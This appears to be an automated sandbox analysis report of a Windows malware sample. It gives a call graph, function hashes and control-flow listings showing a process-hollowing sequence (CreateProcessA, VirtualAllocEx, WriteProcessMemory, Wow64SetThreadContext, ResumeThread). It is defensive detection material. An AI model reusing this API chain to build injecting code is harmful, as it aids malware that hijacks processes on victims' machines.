37001 69867d0 36997->37001 37004 69867e0 36997->37004 36998 6985f4b 36998->36989 37007 698419c 37001->37007 37005 69867fd 37004->37005 37006 698419c DrawTextExW 37004->37006 37005->36998 37006->37005 37008 6986818 DrawTextExW 37007->37008 37010 69867fd 37008->37010 37010->36998 37046 6986c48 37047 6986c82 37046->37047 37048 6986cfe 37047->37048 37049 6986d13 37047->37049 37054 69841c4 37048->37054 37050 69841c4 3 API calls 37049->37050 37052 6986d22 37050->37052 37055 69841cf 37054->37055 37056 6986d09 37055->37056 37059 6987668 37055->37059 37065 6987657 37055->37065 37062 6987682 37059->37062 37071 698420c 37059->37071 37061 698768f 37061->37056 37062->37061 37063 69876b8 CreateIconFromResourceEx 37062->37063 37064 6987736 37063->37064 37064->37056 37066 698420c CreateIconFromResourceEx 37065->37066 37068 6987682 37066->37068 37067 698768f 37067->37056 37068->37067 37069 69876b8 CreateIconFromResourceEx 37068->37069 37070 6987736 37069->37070 37070->37056 37072 69876b8 CreateIconFromResourceEx 37071->37072 37073 6987736 37072->37073 37073->37062 37011 a7d560 37012 a7d5a6 37011->37012 37016 a7d730 37012->37016 37019 a7d740 37012->37019 37013 a7d693 37022 a7d308 37016->37022 37020 a7d308 DuplicateHandle 37019->37020 37021 a7d76e 37019->37021 37020->37021 37021->37013 37023 a7d7a8 DuplicateHandle 37022->37023 37024 a7d76e 37023->37024 37024->37013 37239 a7b1d0 37240 a7b1df 37239->37240 37242 a7b2b7 37239->37242 37243 a7b2fc 37242->37243 37244 a7b2d9 37242->37244 37243->37240 37244->37243 37245 a7b500 GetModuleHandleW 37244->37245 37246 a7b52d 37245->37246 37246->37240 37074 69aa200 37076 69a9ff1 37074->37076 37075 69aa0fd 37076->37075 37079 69aaa50 37076->37079 37085 69aaa60 37076->37085 37080 69aaa75 37079->37080 37091 69aaaa0 37080->37091 37105 69aab06 37080->37105 37120 69aaa91 37080->37120 37081 69aaa87 37081->37076 37086 69aaa75 37085->37086 37088 69aaaa0 12 API calls 37086->37088 37089 69aaa91 12 API calls 37086->37089 37090 69aab06 12 API calls 37086->37090 37087 69aaa87 37087->37076 37088->37087 37089->37087 37090->37087 37092 69aaaba 37091->37092 37134 69aaf36 37092->37134 37139 69aaf96 37092->37139 37146 69aafe1 37092->37146 37150 69aaf12 37092->37150 37157 69ab052 37092->37157 37163 69ab66d 37092->37163 37170 69ab1ae 37092->37170 37175 69aaea9 37092->37175 37179 69aaf49 37092->37179 37183 69ab35b 37092->37183 37187 69ab15a 37092->37187 37093 69aaac2 37093->37081 37106 69aaa94 37105->37106 37108 69aab09 37105->37108 37109 69ab15a 2 API calls 37106->37109 37110 69ab35b 2 API calls 37106->37110 37111 69aaf49 2 API calls 37106->37111 37112 69aaea9 2 API calls 37106->37112 37113 69ab1ae 2 API calls 37106->37113 37114 69ab66d 4 API calls 37106->37114 37115 69ab052 4 API calls 37106->37115 37116 69aaf12 4 API calls 37106->37116 37117 69aafe1 2 API calls 37106->37117 37118 69aaf96 4 API calls 37106->37118 37119 69aaf36 2 API calls 37106->37119 37107 69aaac2 37107->37081 37108->37081 37109->37107 37110->37107 37111->37107 37112->37107 37113->37107 37114->37107 37115->37107 37116->37107 37117->37107 37118->37107 37119->37107 37121 69aaa94 37120->37121 37123 69ab15a 2 API calls 37121->37123 37124 69ab35b 2 API calls 37121->37124 37125 69aaf49 2 API calls 37121->37125 37126 69aaea9 2 API calls 37121->37126 37127 69ab1ae 2 API calls 37121->37127 37128 69ab66d 4 API calls 37121->37128 37129 69ab052 4 API calls 37121->37129 37130 69aaf12 4 API calls 37121->37130 37131 69aafe1 2 API calls 37121->37131 37132 69aaf96 4 API calls 37121->37132 37133 69aaf36 2 API calls 37121->37133 37122 69aaac2 37122->37081 37123->37122 37124->37122 37125->37122 37126->37122 37127->37122 37128->37122 37129->37122 37130->37122 37131->37122 37132->37122 37133->37122 37135 69aaf43 37134->37135 37191 69a9948 37135->37191 37195 69a9950 37135->37195 37136 69ab525 37144 69a9948 WriteProcessMemory 37139->37144 37145 69a9950 WriteProcessMemory 37139->37145 37140 69aaf1e 37140->37139 37141 69ab21b 37140->37141 37199 69a8e98 37140->37199 37203 69a8e90 37140->37203 37141->37093 37144->37140 37145->37140 37147 69aaff9 37146->37147 37207 69a9a38 37147->37207 37211 69a9a40 37147->37211 37152 69aaf1e 37150->37152 37151 69ab21b 37151->37093 37152->37151 37153 69a8e98 ResumeThread 37152->37153 37154 69a8e90 ResumeThread 37152->37154 37155 69a9948 WriteProcessMemory 37152->37155 37156 69a9950 WriteProcessMemory 37152->37156 37153->37152 37154->37152 37155->37152 37156->37152 37215 69a97b8 37157->37215 37219 69a97b0 37157->37219 37158 69aaff9 37161 69a9a38 ReadProcessMemory 37158->37161 37162 69a9a40 ReadProcessMemory 37158->37162 37161->37158 37162->37158 37164 69aaf1e 37163->37164 37165 69ab21b 37164->37165 37166 69a8e98 ResumeThread 37164->37166 37167 69a8e90 ResumeThread 37164->37167 37168 69a9948 WriteProcessMemory 37164->37168 37169 69a9950 WriteProcessMemory 37164->37169 37165->37093 37166->37164 37167->37164 37168->37164 37169->37164 37171 69ab73c 37170->37171 37223 69a9888 37171->37223 37227 69a9890 37171->37227 37172 69ab75a 37231 69a9bd8 37175->37231 37235 69a9bcc 37175->37235 37180 69aaf56 37179->37180 37181 69a9a38 ReadProcessMemory 37180->37181 37182 69a9a40 ReadProcessMemory 37180->37182 37181->37180 37182->37180 37185 69a97b8 Wow64SetThreadContext 37183->37185 37186 69a97b0 Wow64SetThreadContext 37183->37186 37184 69ab375 37185->37184 37186->37184 37189 69a9948 WriteProcessMemory 37187->37189 37190 69a9950 WriteProcessMemory 37187->37190 37188 69ab12e 37188->37093 37189->37188 37190->37188 37192 69a9950 WriteProcessMemory 37191->37192 37194 69a99ef 37192->37194 37194->37136 37196 69a9998 WriteProcessMemory 37195->37196 37198 69a99ef 37196->37198 37198->37136 37200 69a8ed8 ResumeThread 37199->37200 37202 69a8f09 37200->37202 37202->37140 37204 69a8e98 ResumeThread 37203->37204 37206 69a8f09 37204->37206 37206->37140 37208 69a9a40 ReadProcessMemory 37207->37208 37210 69a9acf 37208->37210 37210->37147 37212 69a9a8b ReadProcessMemory 37211->37212 37214 69a9acf 37212->37214 37214->37147 37216 69a97fd Wow64SetThreadContext 37215->37216 37218 69a9845 37216->37218 37218->37158 37220 69a97b8 Wow64SetThreadContext 37219->37220 37222 69a9845 37220->37222 37222->37158 37224 69a98d0 VirtualAllocEx 37223->37224 37226 69a990d 37224->37226 37226->37172 37228 69a98d0 VirtualAllocEx 37227->37228 37230 69a990d 37228->37230 37230->37172 37232 69a9c61 37231->37232 37232->37232 37233 69a9dc6 CreateProcessA 37232->37233 37234 69a9e23 37233->37234 37236 69a9c61 37235->37236 37236->37236 37237 69a9dc6 CreateProcessA 37236->37237 37238 69a9e23 37237->37238 37247 69abc60 37248 69abdeb 37247->37248 37250 69abc86 37247->37250 37250->37248 37251 69a64d0 37250->37251 37252 69abee0 PostMessageW 37251->37252 37253 69abf4c 37252->37253 37253->37250 37025 a74668 37026 a74684 37025->37026 37027 a746a4 37026->37027 37029 a74838 37026->37029 37030 a7485d 37029->37030 37034 a74937 37030->37034 37038 a74948 37030->37038 37036 a7496f 37034->37036 37035 a74a4c 37035->37035 37036->37035 37042 a74544 37036->37042 37039 a7496f 37038->37039 37040 a74a4c 37039->37040 37041 a74544 CreateActCtxA 37039->37041 37041->37040 37043 a75dd8 CreateActCtxA 37042->37043 37045 a75e9b 37043->37045

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 069841C4 Relevance: 6.9, Strings: 5, Instructions: 621COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 294 69841c4-6986d68 297 698724b-69872b4 294->297 298 6986d6e-6986d73 294->298 304 69872bb-6987343 297->304 298->297 299 6986d79-6986d96 298->299 299->304 305 6986d9c-6986da0 299->305 351 698734e-69873ce 304->351 307 6986daf-6986db3 305->307 308 6986da2-6986dac call 69841d4 305->308 311 6986dc2-6986dc9 307->311 312 6986db5-6986dbf call 69841d4 307->312 308->307 314 6986dcf-6986dff 311->314 315 6986ee4-6986ee9 311->315 312->311 328 69875ce-69875f4 314->328 329 6986e05-6986ed8 call 69841e0 * 2 314->329 320 6986eeb-6986eef 315->320 321 6986ef1-6986ef6 315->321 320->321 325 6986ef8-6986efc 320->325 323 6986f08-6986f38 call 69841ec * 3 321->323 323->351 352 6986f3e-6986f41 323->352 325->328 330 6986f02-6986f05 325->330 341 6987604 328->341 342 69875f6-6987602 328->342 329->315 359 6986eda 329->359 330->323 347 6987607-698760c 341->347 342->347 367 69873d5-6987457 351->367 352->351 354 6986f47-6986f49 352->354 354->351 356 6986f4f-6986f84 354->356 366 6986f8a-6986f93 356->366 356->367 359->315 369 6986f99-6986ff3 call 69841ec * 2 call 69841fc * 2 366->369 370 69870f6-69870fa 366->370 373 698745f-69874e1 367->373 413 6987005 369->413 414 6986ff5-6986ffe 369->414 370->373 374 6987100-6987104 370->374 376 69874e9-6987516 373->376 374->376 377 698710a-6987110 374->377 391 698751d-698759d 376->391 381 6987112 377->381 382 6987114-6987149 377->382 385 6987150-6987156 381->385 382->385 390 698715c-6987164 385->390 385->391 395 698716b-698716d 390->395 396 6987166-698716a 390->396 446 69875a4-69875c6 391->446 402 69871cf-69871d5 395->402 403 698716f-6987193 395->403 396->395 406 69871f4-6987222 402->406 407 69871d7-69871f2 402->407 434 698719c-69871a0 403->434 435 6987195-698719a 403->435 425 698722a-6987236 406->425 407->425 419 6987009-698700b 413->419 414->419 420 6987000-6987003 414->420 426 698700d 419->426 427 6987012-6987016 419->427 420->419 445 698723c-6987248 425->445 425->446 426->427 432 6987018-698701f 427->432 433 6987024-698702a 427->433 442 69870c1-69870c5 432->442 440 698702c-6987032 433->440 441 6987034-6987039 433->441 434->328 436 69871a6-69871a9 434->436 444 69871ac-69871bd 435->444 436->444 447 698703f-6987045 440->447 441->447 449 69870e4-69870f0 442->449 450 69870c7-69870e1 442->450 484 69871bf call 6987668 444->484 485 69871bf call 6987657 444->485 446->328 453 698704b-6987050 447->453 454 6987047-6987049 447->454 449->369 449->370 450->449 452 69871c5-69871cd 452->425 459 6987052-6987064 453->459 454->459 464 698706e-6987073 459->464 465 6987066-698706c 459->465 467 6987079-6987080 464->467 465->467 471 6987082-6987084 467->471 472 6987086 467->472 475 698708b-6987096 471->475 472->475 477 6987098-698709b 475->477 478 69870ba 475->478 477->442 479 698709d-69870a3 477->479 478->442 480 69870aa-69870b3 479->480 481 69870a5-69870a8 479->481 480->442 483 69870b5-69870b8 480->483 481->478 481->480 483->442 483->478 484->452 485->452
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                  • API String ID: 0-1677660839
                                                                                                                                                  • Opcode ID: 08371a11efdb4b3a02193f18d162fd9a1e46df29f8cf970505a212c7d829be7e
                                                                                                                                                  • Instruction ID: bb47180a161a444bc51c9a159bb33587d2216ce54e45ebd567926aa9a76fd431
                                                                                                                                                  • Opcode Fuzzy Hash: 08371a11efdb4b3a02193f18d162fd9a1e46df29f8cf970505a212c7d829be7e
                                                                                                                                                  • Instruction Fuzzy Hash: E1324030E00258CFDB94EFB9C89079EBBF6AF84300F2485AAD449AB795DB349D45CB51
                                                                                                                                                  Function 069841BD Relevance: .3, Instructions: 281COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4358f65c71196e4c8e19e29e8e5ba975b48b0bfe5963255cd06323044c3a9250
                                                                                                                                                  • Instruction ID: e6ad176ae99f308527718b6765f2c22288fd0c08d0895d34c3864faf9a967e3d
                                                                                                                                                  • Opcode Fuzzy Hash: 4358f65c71196e4c8e19e29e8e5ba975b48b0bfe5963255cd06323044c3a9250
                                                                                                                                                  • Instruction Fuzzy Hash: 57C15A31E002188FDF94EFA8C88079DBBF2AF85300F2485AAD449AF655EB30D995CF51
                                                                                                                                                  Function 06986D33 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0e49f2f6188730ae0dfe06faf10d431627e35fa42fb0d496585cb808a2c67fb5
                                                                                                                                                  • Instruction ID: 9b710fd6ff28f8649f86d4173608bb968c0d64dc927b2cc3c9acedffa8095b13
                                                                                                                                                  • Opcode Fuzzy Hash: 0e49f2f6188730ae0dfe06faf10d431627e35fa42fb0d496585cb808a2c67fb5
                                                                                                                                                  • Instruction Fuzzy Hash: 2DC15A31E002188FDF94EFA8C88079DBBF2AF85300F2485AAD419AF655EB30D995CF50
                                                                                                                                                  Function 0698F788 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4b1143bc10525eea6586df9294bc648f573b09aecdfbd3bdf6c5ad941f9e70ad
                                                                                                                                                  • Instruction ID: fde2d2442d77b61e01e7d676df02ba01e6aa168ee2072ed9f7b5db5dd3683e63
                                                                                                                                                  • Opcode Fuzzy Hash: 4b1143bc10525eea6586df9294bc648f573b09aecdfbd3bdf6c5ad941f9e70ad
                                                                                                                                                  • Instruction Fuzzy Hash: B0A10270D05228CFEB54EFA6D8407EDBBB6FF89340F10A569D41AA7251DB344985CF80
                                                                                                                                                  Function 0698F778 Relevance: .2, Instructions: 234COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 325da70082e4a2dd2cf1da7049e2b393e75aeb82011bdcdce4b68946959e188b
                                                                                                                                                  • Instruction ID: f229fd4e009cb21c2f8184a76c37e5689595f3c5cabb8fdbf704eebfc14a2325
                                                                                                                                                  • Opcode Fuzzy Hash: 325da70082e4a2dd2cf1da7049e2b393e75aeb82011bdcdce4b68946959e188b
                                                                                                                                                  • Instruction Fuzzy Hash: A3A10370D05228CFEB54EFAAD8447EDBBB6FF89300F10A569D41AAB251DB344985CF80
                                                                                                                                                  Function 00A743E8 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 579797a0d2f7c335ebb8311f6bcca2560be247e002feb9b51e7d2dca3c2dfc32
                                                                                                                                                  • Instruction ID: 7c8645e0bf3446273d3b44d7331b29cfbec9a0574b8f069d57d47a592b1150c8
                                                                                                                                                  • Opcode Fuzzy Hash: 579797a0d2f7c335ebb8311f6bcca2560be247e002feb9b51e7d2dca3c2dfc32
                                                                                                                                                  • Instruction Fuzzy Hash: 0181A674E002189FDB04DFE9C990ADEBBB2FF88310F148169E419BB365DA35A946DF50
                                                                                                                                                  Function 00A77051 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c04d5c850df9dceb1c3be0f4098a649ae52e6cea22da0dad451f0d2d7580ed11
                                                                                                                                                  • Instruction ID: 11d53ef8cdb2a0414cfb7a6ecfc8a1b6dcf4bb1519b808eeca84841533d6d64e
                                                                                                                                                  • Opcode Fuzzy Hash: c04d5c850df9dceb1c3be0f4098a649ae52e6cea22da0dad451f0d2d7580ed11
                                                                                                                                                  • Instruction Fuzzy Hash: F281C574E002188FDB04DFE9C990ADEBBB2FF88310F148069E419BB365DA35A946DF50
                                                                                                                                                  Function 069A3DFB Relevance: .1, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7cd65a8205f7cb16f1f75fc74ea32fc80185989f3533ff1bfd4336a32c796233
                                                                                                                                                  • Instruction ID: 6c70037aba8d8c717e899f282d9630fc99420993cd1f21b6d66bbbd4de1730d0
                                                                                                                                                  • Opcode Fuzzy Hash: 7cd65a8205f7cb16f1f75fc74ea32fc80185989f3533ff1bfd4336a32c796233
                                                                                                                                                  • Instruction Fuzzy Hash: 3B412570E05318CFEB58CF66C9446EDBBF6AF89301F20D5A6D50AA7651DB704D82CE80
                                                                                                                                                  Function 069A3D70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 71eed28892ef8f20fc9964b227a18c961c30528ae9357b0d7f2956415a3f1696
                                                                                                                                                  • Instruction ID: ac64cce6c638dc1070e5adbb5e63bebfbd2c6a861a2bc16ec4501c4117d02aeb
                                                                                                                                                  • Opcode Fuzzy Hash: 71eed28892ef8f20fc9964b227a18c961c30528ae9357b0d7f2956415a3f1696
                                                                                                                                                  • Instruction Fuzzy Hash: A4215B71D052588FEB58CF6BC8442EEBFF7AFC9300F18D46A9409A6655DB700A46CB90
                                                                                                                                                  Function 069A3D80 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 24e7a3f765dbd33a85d7aadf683ee1c65e4aa01b15fb6bce9d3383d052a537ff
                                                                                                                                                  • Instruction ID: ca6dff9ca9011bba9841be153bcabc215c7c5dd809bc020a896156f331690011
                                                                                                                                                  • Opcode Fuzzy Hash: 24e7a3f765dbd33a85d7aadf683ee1c65e4aa01b15fb6bce9d3383d052a537ff
                                                                                                                                                  • Instruction Fuzzy Hash: 9F11EC71E056188BEB58CF5BC9442EEFEF7AFC9300F14D47A9409A6654DF701946CA80
                                                                                                                                                  Function 069A9BCC Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 762 69a9bcc-69a9c6d 764 69a9c6f-69a9c79 762->764 765 69a9ca6-69a9cc6 762->765 764->765 766 69a9c7b-69a9c7d 764->766 772 69a9cc8-69a9cd2 765->772 773 69a9cff-69a9d2e 765->773 767 69a9c7f-69a9c89 766->767 768 69a9ca0-69a9ca3 766->768 770 69a9c8b 767->770 771 69a9c8d-69a9c9c 767->771 768->765 770->771 771->771 774 69a9c9e 771->774 772->773 775 69a9cd4-69a9cd6 772->775 779 69a9d30-69a9d3a 773->779 780 69a9d67-69a9e21 CreateProcessA 773->780 774->768 777 69a9cd8-69a9ce2 775->777 778 69a9cf9-69a9cfc 775->778 781 69a9ce6-69a9cf5 777->781 782 69a9ce4 777->782 778->773 779->780 784 69a9d3c-69a9d3e 779->784 793 69a9e2a-69a9eb0 780->793 794 69a9e23-69a9e29 780->794 781->781 783 69a9cf7 781->783 782->781 783->778 785 69a9d40-69a9d4a 784->785 786 69a9d61-69a9d64 784->786 788 69a9d4e-69a9d5d 785->788 789 69a9d4c 785->789 786->780 788->788 791 69a9d5f 788->791 789->788 791->786 804 69a9eb2-69a9eb6 793->804 805 69a9ec0-69a9ec4 793->805 794->793 804->805 806 69a9eb8 804->806 807 69a9ec6-69a9eca 805->807 808 69a9ed4-69a9ed8 805->808 806->805 807->808 809 69a9ecc 807->809 810 69a9eda-69a9ede 808->810 811 69a9ee8-69a9eec 808->811 809->808 810->811 812 69a9ee0 810->812 813 69a9efe-69a9f05 811->813 814 69a9eee-69a9ef4 811->814 812->811 815 69a9f1c 813->815 816 69a9f07-69a9f16 813->816 814->813 818 69a9f1d 815->818 816->815 818->818
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A9E0E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 1c2bd975b08d1b7b4dbc88503dc0322b5c6c3861b8faaf4116ab229a22a0d4af
                                                                                                                                                  • Instruction ID: 01df53c4379971a77e0ae21948bcd360ee98a31db3b81a32a30dd705953ec9ff
                                                                                                                                                  • Opcode Fuzzy Hash: 1c2bd975b08d1b7b4dbc88503dc0322b5c6c3861b8faaf4116ab229a22a0d4af
                                                                                                                                                  • Instruction Fuzzy Hash: 7CA16871D107198FDF60CF68C8417EEBBF6BB48314F2485AAE809A7680DB749985CF91
                                                                                                                                                  Function 069A9BD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 819 69a9bd8-69a9c6d 821 69a9c6f-69a9c79 819->821 822 69a9ca6-69a9cc6 819->822 821->822 823 69a9c7b-69a9c7d 821->823 829 69a9cc8-69a9cd2 822->829 830 69a9cff-69a9d2e 822->830 824 69a9c7f-69a9c89 823->824 825 69a9ca0-69a9ca3 823->825 827 69a9c8b 824->827 828 69a9c8d-69a9c9c 824->828 825->822 827->828 828->828 831 69a9c9e 828->831 829->830 832 69a9cd4-69a9cd6 829->832 836 69a9d30-69a9d3a 830->836 837 69a9d67-69a9e21 CreateProcessA 830->837 831->825 834 69a9cd8-69a9ce2 832->834 835 69a9cf9-69a9cfc 832->835 838 69a9ce6-69a9cf5 834->838 839 69a9ce4 834->839 835->830 836->837 841 69a9d3c-69a9d3e 836->841 850 69a9e2a-69a9eb0 837->850 851 69a9e23-69a9e29 837->851 838->838 840 69a9cf7 838->840 839->838 840->835 842 69a9d40-69a9d4a 841->842 843 69a9d61-69a9d64 841->843 845 69a9d4e-69a9d5d 842->845 846 69a9d4c 842->846 843->837 845->845 848 69a9d5f 845->848 846->845 848->843 861 69a9eb2-69a9eb6 850->861 862 69a9ec0-69a9ec4 850->862 851->850 861->862 863 69a9eb8 861->863 864 69a9ec6-69a9eca 862->864 865 69a9ed4-69a9ed8 862->865 863->862 864->865 866 69a9ecc 864->866 867 69a9eda-69a9ede 865->867 868 69a9ee8-69a9eec 865->868 866->865 867->868 869 69a9ee0 867->869 870 69a9efe-69a9f05 868->870 871 69a9eee-69a9ef4 868->871 869->868 872 69a9f1c 870->872 873 69a9f07-69a9f16 870->873 871->870 875 69a9f1d 872->875 873->872 875->875
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A9E0E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: b2c50f446bb1b40615cd17ee00b467012ee22cd32dab40416a6a53cfe498585e
                                                                                                                                                  • Instruction ID: 689992d9359f7f1ddde04d2220c6144a1b4ba239176555915e8f3f98a1daa62d
                                                                                                                                                  • Opcode Fuzzy Hash: b2c50f446bb1b40615cd17ee00b467012ee22cd32dab40416a6a53cfe498585e
                                                                                                                                                  • Instruction Fuzzy Hash: 72916871D107198FDF60CF68C8407AEBBF6BF48314F2485AAE808A7690DB749985CF91
                                                                                                                                                  Function 00A7B2B7 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 876 a7b2b7-a7b2d7 877 a7b303-a7b307 876->877 878 a7b2d9-a7b2e6 call a79d40 876->878 880 a7b31b-a7b35c 877->880 881 a7b309-a7b313 877->881 884 a7b2fc 878->884 885 a7b2e8 878->885 887 a7b35e-a7b366 880->887 888 a7b369-a7b377 880->888 881->880 884->877 933 a7b2ee call a7b560 885->933 934 a7b2ee call a7b550 885->934 887->888 889 a7b39b-a7b39d 888->889 890 a7b379-a7b37e 888->890 895 a7b3a0-a7b3a7 889->895 892 a7b380-a7b387 call a7af58 890->892 893 a7b389 890->893 891 a7b2f4-a7b2f6 891->884 894 a7b438-a7b4f8 891->894 897 a7b38b-a7b399 892->897 893->897 926 a7b500-a7b52b GetModuleHandleW 894->926 927 a7b4fa-a7b4fd 894->927 898 a7b3b4-a7b3bb 895->898 899 a7b3a9-a7b3b1 895->899 897->895 902 a7b3bd-a7b3c5 898->902 903 a7b3c8-a7b3d1 call a7af68 898->903 899->898 902->903 907 a7b3d3-a7b3db 903->907 908 a7b3de-a7b3e3 903->908 907->908 909 a7b3e5-a7b3ec 908->909 910 a7b401-a7b405 908->910 909->910 912 a7b3ee-a7b3fe call a7af78 call a7af88 909->912 931 a7b408 call a7b853 910->931 932 a7b408 call a7b860 910->932 912->910 915 a7b40b-a7b40e 917 a7b431-a7b437 915->917 918 a7b410-a7b42e 915->918 918->917 928 a7b534-a7b548 926->928 929 a7b52d-a7b533 926->929 927->926 929->928 931->915 932->915 933->891 934->891
                                                                                                                                                  APIs
